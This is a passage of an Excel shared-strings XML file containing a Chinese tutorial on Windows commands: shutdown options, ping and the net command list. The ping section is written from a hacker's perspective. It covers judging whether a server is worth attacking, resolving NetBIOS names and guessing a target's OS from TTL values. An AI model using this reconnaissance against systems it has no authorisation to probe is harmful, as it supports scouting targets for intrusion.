  </si>
  <si>
    <t>注意：无论用什么方法安装，安装前注意备份个人数据和驱动程序！</t>
  </si>
  <si>
    <t>雨林木风 WinXP SP2 安装</t>
  </si>
  <si>
    <t>shutdown命令的用法</t>
  </si>
  <si>
    <t>在开始运行-输入cmd</t>
  </si>
  <si>
    <t>输入</t>
  </si>
  <si>
    <t>shutdown</t>
  </si>
  <si>
    <t>将会弹出以下参数</t>
  </si>
  <si>
    <t>用法: shutdown [-i | -l | -s | -r | -a] [-f] [-m \\computername] [-t xx] [-c</t>
  </si>
  <si>
    <t>mment"] [-d up:xx:yy]</t>
  </si>
  <si>
    <t>        没有参数                显示此消息(与 ? 相同)</t>
  </si>
  <si>
    <t>        -i                      显示 GUI 界面，必须是第一个选项</t>
  </si>
  <si>
    <t>        -l                      注销(不能与选项 -m 一起使用)</t>
  </si>
  <si>
    <t>        -s                      关闭此计算机</t>
  </si>
  <si>
    <t>        -r                      关闭并重启动此计算机</t>
  </si>
  <si>
    <t>        -a                      放弃系统关机</t>
  </si>
  <si>
    <t>        -m \\computername       远程计算机关机/重启动/放弃</t>
  </si>
  <si>
    <t>        -t xx                   设置关闭的超时为 xx 秒</t>
  </si>
  <si>
    <t>        -c "comment"            关闭注释(最大 127 个字符)</t>
  </si>
  <si>
    <t>        -f                      强制运行的应用程序关闭而没有警告</t>
  </si>
  <si>
    <t>        -d [u][p]:xx:yy         关闭原因代码</t>
  </si>
  <si>
    <t>                                u 是用户代码</t>
  </si>
  <si>
    <t>                                p 是一个计划的关闭代码</t>
  </si>
  <si>
    <t>                                xx 是一个主要原因代码(小于 256 的正整数)</t>
  </si>
  <si>
    <t>                                yy 是一个次要原因代码(小于 65536 的正整数)</t>
  </si>
  <si>
    <r>
      <t>一、</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>ping</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>命令</t>
    </r>
  </si>
  <si>
    <r>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>在</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>Windows</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>的控制窗口中（</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>Windows 95/98/ME</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>的</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>command</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>解释器、</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>Windows NT/2000</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>的</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>cmd</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>解释器），运行</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>ping</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>可以看到这个命令的说明，它是一个探测本地电脑和远程电脑之间信息传送速度的命令，这个命令需要</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>TCP/IP</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>协议的支持，</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>ping</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>将会计算一条信息从本地发送到远程再返回所需要的时间，黑客使用这个命令决定是否对服务器进行攻击，因为连接速度过慢会浪费时间、花费过多的上网费用。</t>
    </r>
  </si>
  <si>
    <r>
      <t>另外这个命令还可以透过域名找到对方服务器的</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>IP</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>地址，我们知道域名只是提供给浏览网页用的，当我们看到一个不错的域名地址后，要想通过</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>telnet</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>连接它，就必须知道对方的</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>IP</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>地址，这里也要使用</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>ping</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>命令的。</t>
    </r>
  </si>
  <si>
    <r>
      <t>这个命令的基本使用格式可以通过直接运行</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>ping</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>获得，现在假设目标是</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>http://www.abc.com/</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>，则可以在控制台下输入</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>ping www.abc.com</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>，经过等待会得到如下信息：</t>
    </r>
  </si>
  <si>
    <t>Pinging www.abc.com [204.202.136.32] with 32 bytes of data:</t>
  </si>
  <si>
    <t>Reply from 204.202.136.32: bytes=32 time=302ms TTL=240</t>
  </si>
  <si>
    <t>Reply from 204.202.136.32: bytes=32 time=357ms TTL=240</t>
  </si>
  <si>
    <t>Reply from 204.202.136.32: bytes=32 time=288ms TTL=240</t>
  </si>
  <si>
    <t>Reply from 204.202.136.32: bytes=32 time=274ms TTL=240</t>
  </si>
  <si>
    <t>Ping statistics for 204.202.136.32:</t>
  </si>
  <si>
    <t>Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),</t>
  </si>
  <si>
    <t>Approximate round trip times in milli-seconds:</t>
  </si>
  <si>
    <t>Minimum = 274ms, Maximum = 357ms, Average = 305ms</t>
  </si>
  <si>
    <r>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>这些信息的意思是：</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>www.abc.com</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>的</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>IP</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>地址是</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>204.202.136.32</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>，对他发送了四次数据包，数据包的大小是</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>32</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>字节，每一次返回的时间分别是</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>302ms</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>、</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>357ms</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>、</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>288ms</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>、</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>274ms</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>。综合看，发送了四个数据包全部返回，最小时间是</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>274ms</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>，最大时间</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>357ms</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>，他们的平均时间是</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>305ms</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>。</t>
    </r>
  </si>
  <si>
    <r>
      <t>这样黑客就了解了连接对方服务器使用的时间。另外这个命令还有一些特殊的用法，例如可以通过</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>IP</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>地址反查服务器的</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>NetBIOS</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>名，现在以</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>211.100.8.87</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>为例，使用</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>ping</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>配合“</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>-a</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>”，在控制台下输入命令</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>ping -a 211.100.8.87</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>，它的返回结果是：</t>
    </r>
  </si>
  <si>
    <t>Pinging POPNET-FBZ9JDFV [211.100.8.87] with 32 bytes of data:</t>
  </si>
  <si>
    <t>Reply from 211.100.8.87: bytes=32 time=96ms TTL=120</t>
  </si>
  <si>
    <t>Reply from 211.100.8.87: bytes=32 time=110ms TTL=120</t>
  </si>
  <si>
    <t>Reply from 211.100.8.87: bytes=32 time=109ms TTL=120</t>
  </si>
  <si>
    <t>Ping statistics for 211.100.8.87:</t>
  </si>
  <si>
    <t>Minimum = 96ms, Maximum = 110ms, Average = 106ms</t>
  </si>
  <si>
    <r>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>从这个结果会知道服务器的</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>NetBIOS</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>名称是</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>POPNET-FBZ9JDFV</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>。另外在一般情况下还可以通过</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>ping</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>对方让对方返回给你的</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>TTL</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>值大小，粗略的判断目标主机的系统类型是</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>Windows</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>系列还是</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>UNIX/Linux</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>系列，一般情况下</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>Windows</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>系列的系统返回的</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>TTL</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>值在</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>100-130</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>之间，而</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>UNIX/Linux</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>系列的系统返回的</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>TTL</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>值在</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>240-255</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>之间，例如上面的</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>www.abc.com</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>返回的</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>TTL</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>是</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>240</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>，对方的系统很可能是</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>Linux</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>，而第二个目标的</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>TTL</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>是</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>120</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>，那么说明它使用的系统也许是</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>Windows</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>。</t>
    </r>
  </si>
  <si>
    <r>
      <t>另外</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>ping</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>还有很多灵活的应用，我不在这里过多的介绍，读者请另行查阅此命令相关帮助文件。</t>
    </r>
  </si>
  <si>
    <r>
      <t>二、</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>net</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>命令</t>
    </r>
  </si>
  <si>
    <r>
      <t xml:space="preserve">    NET</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>命令是很多网络命令的集合，在</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>Windows ME/NT/2000</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>内，很多网络功能都是以</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>net</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>命令为开始的，通过</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>net help</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>可以看到这些命令的详细介绍：</t>
    </r>
  </si>
  <si>
    <r>
      <t xml:space="preserve">NET CONFIG </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>显示系统网络设置</t>
    </r>
  </si>
  <si>
    <r>
      <t xml:space="preserve">NET DIAG </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>运行</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>MS</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>的</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>DIAGNOSTICS</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>程序显示网络的</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>DIAGNOSTIC</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>信息</t>
    </r>
  </si>
  <si>
    <r>
      <t xml:space="preserve">NET HELP </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>显示帮助信息</t>
    </r>
  </si>
  <si>
    <r>
      <t xml:space="preserve">NET INIT </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>不通过绑定来加载协议或网卡驱动</t>
    </r>
  </si>
  <si>
    <r>
      <t xml:space="preserve">NET LOGOFF </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>断开连接的共享资源</t>
    </r>
  </si>
  <si>
    <r>
      <t xml:space="preserve">NET LOGON </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>在</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>WORKGROUP</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>中登陆</t>
    </r>
  </si>
  <si>
    <r>
      <t xml:space="preserve">NET PASSWORD </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>改变系统登陆密码</t>
    </r>
  </si>
  <si>
    <r>
      <t xml:space="preserve">NET PRINT </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>显示或控制打印作业及打印队列</t>
    </r>
  </si>
  <si>
    <r>
      <t xml:space="preserve">NET START </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>启动服务，或显示已启动服务的列表</t>
    </r>
  </si>
  <si>
    <r>
